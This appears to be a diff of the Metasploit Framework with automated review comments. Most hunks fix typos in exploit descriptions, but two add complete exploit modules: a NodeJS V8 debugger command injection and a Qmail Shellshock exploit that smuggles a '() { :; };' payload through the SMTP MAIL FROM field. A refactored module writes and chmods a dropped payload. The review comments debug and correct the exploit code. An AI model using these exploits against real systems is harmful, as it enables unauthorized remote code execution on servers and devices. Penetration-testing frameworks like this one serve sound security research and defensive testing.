@@ -270,25 +257,25 @@ class MetasploitModule < Msf::Exploit::Remote formats.each do |fmt,name| if fmt == "L" || fmt == 8 - data[name] = buf.unpack('Q>')[0] - buf.slice!(0..7) + data[name] = buf[index, 8].unpack('Q>')[0] + index += 8 elsif fmt == "I" || fmt == 4 - data[name] = buf.unpack('N')[0] - buf.slice!(0..3) + data[name] = buf[index, 4].unpack('N')[0] + index += 4 elsif fmt == "S" - data_len = buf.unpack('N')[0] - buf.slice!(0..3) - data[name] = buf.slice!(0,data_len) + data_len = buf[index, 4].unpack('N')[0] + data[name] = buf[index + 4, data_len] + index += 4 + data_len elsif fmt == "C" - data[name] = buf.unpack('C')[0] - buf.slice!(0) + data[name] = buf[index].unpack('C')[0] + index += 1 elsif fmt == "Z" - t = buf.unpack('C')[0] - buf.slice!(0) + t = buf[index].unpack('C')[0] if t == 115 - data[name] = solve_string(buf.slice!(0..7)) + data[name] = solve_string(buf[index + 1, 8]) + index += 9 elsif t == 73 - data[name], buf = buf.unpack('NN') + data[name], buf = buf[index +1, 4].unpack('NN') end else fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response") @@ -340,13 +327,13 @@ class MetasploitModule < Msf::Exploit::Remote sock.put(create_packet(ALLTHREADS_SIG)) response = read_reply num_threads = response.unpack('N').first - response.slice!(0..3) + index = 4 size = @vars["objectid_size"] num_threads.times do - t_id = unformat(size, response[0..size-1]) + t_id = unformat(size, response[index, size]) @threads[t_id] = nil - response.slice!(0..size-1) + index += size end end @@ -429,10 +416,8 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, "Bad response when getting value for field") end - response.slice!(0..4) - len = @vars["objectid_size"] - value = unformat(len, response) + value = unformat(len, response[5..-1]) value end 
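Review bot: In the `fmt == "Z"` branch the `t == 73` case does not advance `index` and assigns `buf` from `buf[index +1, 4].unpack('NN')`, which over a 4-byte slice yields `[value, nil]` and leaves `buf` nil for every later entry; the removed `slice!` version was already odd here, but the index-based rewrite makes the breakage immediate on the next iteration. Use `data[name] = buf[index + 1, 4].unpack('N')[0]` and `index += 5` (one tag byte plus the 4-byte value). A tag that is neither 115 nor 73 currently leaves `index` where it was and silently continues; failing with `Failure::UnexpectedReply`, as the outer else already does, would surface malformed replies instead. parse_entries begins in the previous hunk and its loop continues past this one.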
@@ -688,15 +673,16 @@ class MetasploitModule < Msf::Exploit::Remote when 'linux' path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" - if @os.downcase =~ /win/ - print_warning("#{@os} system detected but using Linux target...") - end + when 'osx' + path = temp_path || '/private/tmp/' + payload_exe = "#{path}#{payload_exe}" when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" - unless @os.downcase =~ /win/ - print_warning("#{@os} system detected but using Windows target...") - end + end + + if @os.downcase =~ /target['Platform']/ + print_warning("#{@os} system detected but using #{target['Platform']} target...") end return payload_exe, pl_exe @@ -900,7 +886,7 @@ class MetasploitModule < Msf::Exploit::Remote close_file(thread_id, file) # 5b. When linux arch, give execution permissions to file - if target['Platform'] == 'linux' + if target['Platform'] == 'linux' || target['Platform'] == 'osx' cmd = "chmod +x #{payload_exe}" execute_command(thread_id, cmd) end diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index cf440b2f4a..76b480566b 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb 
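Review bot: `if @os.downcase =~ /target['Platform']/` does not do what the surrounding code intends: a regex literal does not interpolate, so the pattern matches the literal text `target` followed by one character from the class `['Platform']`, and the condition is also inverted relative to the removed checks, which warned when the detected OS did not match the chosen target. It should read `unless @os.downcase =~ /#{Regexp.escape(target['Platform'])}/`. Even then the new `osx` platform string is unlikely to appear verbatim in whatever `@os` reports for a Mac, so the warning may fire spuriously for the OSX target; worth checking what `@os` holds there. The enclosing method starts outside the hunk.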
@@ -12,13 +12,13 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Legend Perl IRC Bot Remote Code Execution', 'Description' => %q{ - This module exploits a remote command execution on the Legend Perl IRC Bot . + This module exploits a remote command execution on the Legend Perl IRC Bot. This bot has been used as a payload in the Shellshock spam last October 2014. This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and UDP flooding, the ability to remove system logs, and ability to gain root, and VNC scanning. - Kevin Stevens, a Senior Threat Researcher at Damballa has uploaded this script + Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76. }, 'Author' => diff --git a/modules/exploits/multi/misc/nodejs_v8_debugger.rb b/modules/exploits/multi/misc/nodejs_v8_debugger.rb new file mode 100644 index 0000000000..ac1e5b4573 --- /dev/null +++ b/modules/exploits/multi/misc/nodejs_v8_debugger.rb 
@@ -0,0 +1,90 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n" + + def initialize(info={}) + super(update_info(info, + 'Name' => "NodeJS Debugger Command Injection", + 'Description' => %q{ + This module uses the "evaluate" request type of the NodeJS V8 + debugger protocol (version 1) to evaluate arbitrary JS and + call out to other system commands. The port (default 5858) is + not exposed non-locally in default configurations, but may be + exposed either intentionally or via misconfiguration. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Patrick Thomas ' ], + 'References' => + [ + [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ], + [ 'URL', 'https://github.com/nodejs/node/pull/8106' ] + ], + 'Targets' => + [ + ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Aug 15 2016", + 'DefaultTarget' => 0) + ) + + register_options( + [ + Opt::RPORT(5858) + ]) + end + + def make_eval_message + msg_body = { seq: 1, + type: 'request', + command: 'evaluate', + arguments: { expression: payload.encoded, + global: true, + maxStringLength:-1 + } + }.to_json + msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length} + msg_header + msg_body + end + + def check + connect + res = sock.get_once + disconnect + + if res.include? "V8-Version" and res.include? 
"Protocol-Version: 1" + vprint_status("Got debugger handshake:\n#{res}") + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Unknown + end + + def exploit + connect + # must consume incoming handshake before sending payload + buf = sock.get_once + msg = make_eval_message + print_status("Sending #{msg.length} byte payload...") + vprint_status("#{msg}") + sock.put(msg) + buf = sock.get_once + + if buf.include? '"command":"evaluate","success":true' + print_status("Got success response") + elsif buf.include? '"command":"evaluate","success":false' + print_error("Got failure response: #{buf}") + else + print_error("Got unexpected response: #{buf}") + end + end + +end diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index 6ac5a0970f..37334b24aa 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or - a fileformat that OS X might automount), and then execute it in /Volumes/[share]. + a file format that OS X might automount), and then execute it in /Volumes/[share]. If there's some kind of bug that leaks the victim machine's current username, then it's also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index aea3f6f4b0..8f9960e8d8 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb 
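Review bot: `make_eval_message` derives `Content-Length` from `msg_body.length`, which counts characters rather than bytes; if `payload.encoded` ever contains non-ASCII text the header understates the body and the debugger waits for bytes that never arrive, so use `msg_body.bytesize`. Both `check` and `exploit` call `res.include?` / `buf.include?` on the result of `sock.get_once` without a nil guard, so a silent or slow endpoint raises NoMethodError instead of returning `CheckCode::Unknown` or a clear error; add `return Exploit::CheckCode::Unknown unless res` after `disconnect`, and an equivalent guard before the response checks in `exploit`. The `and` in `check` works only because of its low precedence; `res.include?("V8-Version") && res.include?("Protocol-Version: 1")` says the same thing in the file's usual form. The first `buf = sock.get_once` in `exploit` is assigned but never read, so a bare `sock.get_once` under the existing comment is clearer.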
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, - 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerablity. + 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability. }, 'Author' => [ diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index c8460f9b3e..f51ec3ce44 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local Note: If the user has locked the Date/Time preferences, requests to overwrite the system clock will be ignored, and the module will silently fail. However, if the "Require an administrator password to access locked preferences" setting - is not enabled, the Date/Time preferences are often unlocked everytime the admin + is not enabled, the Date/Time preferences are often unlocked every time the admin logs in, so you can install persistence and wait for a chance later. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 82539a609e..98da8084b3 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability', 'Description' => %q{ - This module exploits the argument injection vulnerabilty + This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11. }, 'Author' => [ 'MC' ], 
diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 75dbfa1db1..fa18f67d63 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'LifeSize Room Command Injection', 'Description' => %q{ This module exploits a vulnerable resource in LifeSize - Room versions 3.5.3 and 4.7.18 to inject OS commmands. LifeSize + Room versions 3.5.3 and 4.7.18 to inject OS commands. LifeSize Room is an appliance and thus the environment is limited resulting in a small set of payload options. }, diff --git a/modules/exploits/unix/local/at_persistence.rb b/modules/exploits/unix/local/at_persistence.rb index 7dc93e6020..f9bbe01b21 100644 --- a/modules/exploits/unix/local/at_persistence.rb +++ b/modules/exploits/unix/local/at_persistence.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Local info, 'Name' => 'at(1) Persistence', 'Description' => %q( - This module achieves persisience by executing payloads via at(1). + This module achieves persistence by executing payloads via at(1). ), 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/unix/misc/psh_auth_bypass.rb b/modules/exploits/unix/misc/psh_auth_bypass.rb index 016970fd0c..efd720ef17 100644 --- a/modules/exploits/unix/misc/psh_auth_bypass.rb +++ b/modules/exploits/unix/misc/psh_auth_bypass.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 18 2013', 'Description' => %q( The login component of the Polycom Command Shell on Polycom HDX - video endpints, running software versions 3.0.5 and earlier, + video endpoints, running software versions 3.0.5 and earlier, is vulnerable to an authorization bypass when simultaneous connections are made to the service, allowing remote network attackers to gain access to a sandboxed telnet prompt without 
diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index 2c443fb470..38735fbbee 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary - commands under root priviages. + commands under root privileges. }, 'Author' => [ diff --git a/modules/exploits/unix/smtp/qmail_bash_env_exec.rb b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb new file mode 100644 index 0000000000..5f657dac0d --- /dev/null +++ b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb 
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Smtp
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
+ 'Description' => %q{
+ This module exploits a shellshock vulnerability on Qmail, a public
+ domain MTA written in C that runs on Unix systems.
+ Due to the lack of validation on the MAIL FROM field, it is possible to
+ execute shell code on a system with a vulnerable BASH (Shellshock).
+ This flaw works on the latest Qmail versions (qmail-1.03 and
+ netqmail-1.06).
+ However, in order to execute code, /bin/sh has to be linked to bash
+ (usually default configuration) and a valid recipient must be set on the
+ RCPT TO field (usually admin@exampledomain.com).
+ The exploit does not work on the "qmailrocks" community version
+ as it ensures the MAILFROM field is well-formed.
+ },
+ 'Author' =>
+ [
+ 'Mario Ledo (Metasploit module)',
+ 'Gabriel Follon (Metasploit module)',
+ 'Kyle George (Vulnerability discovery)'
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'References' =>
+ [
+ ['CVE', '2014-6271'],
+ ['CWE', '94'],
+ ['OSVDB', '112004'],
+ ['EDB', '34765'],
+ ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
+ ['URL', 'https://lists.gt.net/qmail/users/138578']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x3e",
+ 'Space' => 888,
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic telnet perl ruby python'
+ # telnet ruby python and perl works only if installed on target
+ }
+ },
+ 'Targets' => [ [ 'Automatic', { }] ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 24 2014'
+ ))
+
+ deregister_options('MAILFROM')
+ end
+
+ def smtp_send(data = nil)
+ begin
+ result = ''
+ code = 0
+ sock.put("#{data}")
+ result = sock.get_once
+ result.chomp! if (result)
+ code = result[0..2].to_i if result
+ return result, code
+ rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
+ return result, 0
+ rescue ::Exception => e
+ print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
+ return nil, 0
+ end
+ end
+
+ def exploit
+ to = datastore['MAILTO']
+ connect
+ result = smtp_send("HELO localhost\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ print_status('Sending the payload...')
+ result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ print_status("Sending RCPT TO #{to}")
+ result = smtp_send("rcpt to:<#{to}>\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ result = smtp_send("data\r\n")
+ if result[1] < 200 || result[1] > 354
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
+ if result[1] < 200 || result[1] > 300
+ fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+ end
+ disconnect
+ end
+end
diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb
index fd8eeb8906..8d63607452 100644
--- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb
+++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only - present when AllowToUpdateStatsFromBrowser is enabled in the AWstats + present when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file (non-default). }, 'Author' => [ 'patrick' ],
diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb
index 917ea4401e..e703cce4c5 100644
--- a/modules/exploits/unix/webapp/barracuda_img_exec.rb
+++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Barracuda IMG.PL Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the - Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. + Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. }, 'Author' => [ 'Nicolas Gregoire ', 'hdm' ], 'License' => MSF_LICENSE,
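Review bot: The MAIL FROM line in `exploit` escapes the payload with `gsub!`, which returns nil when the string contains no backslash, so `"mail from:<() { :; }; " + nil` raises TypeError for every payload that needs no escaping; use the non-mutating form, `result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub(/\\/, '\\\\\\\\') + ">\r\n")`. In `smtp_send` the fallback `rescue ::Exception => e` also traps SignalException and SystemExit, so an interrupted run is reported as an SMTP error and then continues; `rescue ::StandardError => e` keeps the intended catch-all without that side effect. The five repeated `if result[1] < 200 || result[1] > N` / `fail_with(...)` blocks could be folded into a small private helper that takes the accepted upper bound, which would also make the deliberate `354` limit on the DATA step self-documenting.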
diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 2b9ff2ba57..ed306fb329 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a - malicious PHP file without authentication, which results in arbitary remote code + malicious PHP file without authentication, which results in arbitrary remote code execution. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index a57a85d5b8..22b25196f1 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Joomla Component JCE File Upload Remote Code Execution', 'Description' => %q{ - This module exploits a vulnerability in the JCE component for Joomla!, which + This module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 47c325ea10..7133dc93f3 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and possibly prior. Attackers can bypass the file extension check and abuse the upload feature in order to upload a malicious PHP file without authentication, which - results in arbitary remote code execution. + results in arbitrary remote code execution. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index f266206b11..96e979c805 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PhpMyAdmin Config File Code Injection', 'Description' => %q{ - This module exploits a vulnerability in PhpMyAdmin's setup + This module exploits a vulnerability in phpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index e623fdc2cd..b1e395cb60 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a PHP code injection in SPIP. The vulnerability exists in the connect parameter and allows an unauthenticated user to execute arbitrary commands - with web user privileges. Branchs 2.0, 2.1 and 3 are concerned. Vulnerable versions + with web user privileges. Branches 2.0, 2.1 and 3 are concerned. Vulnerable versions are <2.0.21, <2.1.16 and < 3.0.3, but this module works only against branch 2.0 and has been tested successfully with SPIP 2.0.11 and SPIP 2.0.20 with Apache on Ubuntu and Fedora linux distributions. diff --git a/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb b/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb index bf68237aca..214bfdd9fc 100644 --- a/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb @@ -17,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user. - The issue comes with one of the 3rd party components. Name of that components is - ELFinder -version 2.0-. This components comes with default example page which + The issue comes with one of the 3rd party components. Name of that component is + ELFinder -version 2.0-. This component comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload PHP file. diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index bdeea042ef..e320e173ec 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb 
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Tuleap PHP Unserialize Code Execution', 'Description' => %q{ - This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be + This module exploits a PHP object injection vulnerability in Tuleap <= 7.6-4 which could be abused to allow authenticated users to execute arbitrary code with the permissions of the web server. The dangerous unserialize() call exists in the 'src/www/project/register.php' file. The exploit abuses the destructor method from the Jabbex class in order to reach a diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index b3679f5660..09f36d5456 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random - page on the SandBox space. The modules has been tested successfully on + page on the SandBox space. The module has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine. }, 'Author' => diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index c6ae9ec713..b0faae0804 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote be used to bypass the session check as long as at least one session has been created at some point in time. In case there isn't any valid session, the user can provide astGUIcient credentials in order to create one. The results of the injected - command are returned as part of the response from the web server. Affected versions + commands are returned as part of the response from the web server. Affected versions include 2.7RC1, 2.7, and 2.8-403a. Other versions are likely affected as well. The default credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit. }, diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 1ec1f68f3b..ebc82466e6 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in Webmin 1.580. The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary - commands with root privileges. The module has been tested successfully with Webim + commands with root privileges. The module has been tested successfully with Webmin 1.580 over Ubuntu 10.04. }, 'Author' => [ diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index fc117add39..fc1e636fcf 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb 
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote blogging software plugin known as Google Document Embedder. The vulnerability allows for database credential disclosure via the /libs/pdf.php script. The Google Document Embedder plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL - server is exposed on a accessible IP and Wordpress has filesystem write access. + server is exposed on an accessible IP and WordPress has filesystem write access. Please note: The admin password may get changed if the exploit does not run to the end. }, diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index 4810437411..aac11a89fe 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability', 'Description' => %q{ - This module exploits a vulnerability found in the the WordPress theme OptimizePress. The + This module exploits a vulnerability found in the WordPress theme OptimizePress. The vulnerability is due to an insecure file upload on the media-upload.php component, allowing an attacker to upload arbitrary PHP code. This module has been tested successfully on OptimizePress 1.45. diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index f4b15a12ec..84fd88e844 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ The WordPress Theme "platform" contains a remote code execution vulnerability through an unchecked admin_init call. The theme includes the uploaded file - from it's temp filename with php's include function. + from its temp filename with php's include function. }, 'Author' => [ diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index 4ffd012cce..c7f088b016 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -12,14 +12,14 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info( info, - 'Name' => 'Wordpress WPTouch Authenticated File Upload', + 'Name' => 'WordPress WPTouch Authenticated File Upload', 'Description' => %q{ - The Wordpress WPTouch plugin contains an auhtenticated file upload + The WordPress WPTouch plugin contains an authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also - uses it's own file upload mechanism instead of the wordpress api it's + uses its own file upload mechanism instead of the WordPress api it's possible to upload any file type. The user provided does not need special rights, and users with "Contributor" role can be abused. diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index a7c2c1d256..9f36541072 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a vulnerability found in ZPanel's htpasswd module. When creating .htaccess using the htpasswd module, the username field can be used to inject system commands, which is passed on to a system() function for executing - the system's htpasswd's command. + the system's htpasswd command. Please note: In order to use this module, you must have a valid account to login to ZPanel. An account part of any of the default groups should suffice, such as: diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 6ff5dea6be..64ceee4d72 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CA BrightStor ArcServe Media Service Stack Buffer Overflow', 'Description' => %q{ This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA - BrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker + BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker can overflow a stack buffer and execute arbitrary code. }, 'Author' => [ 'toto' ], diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb 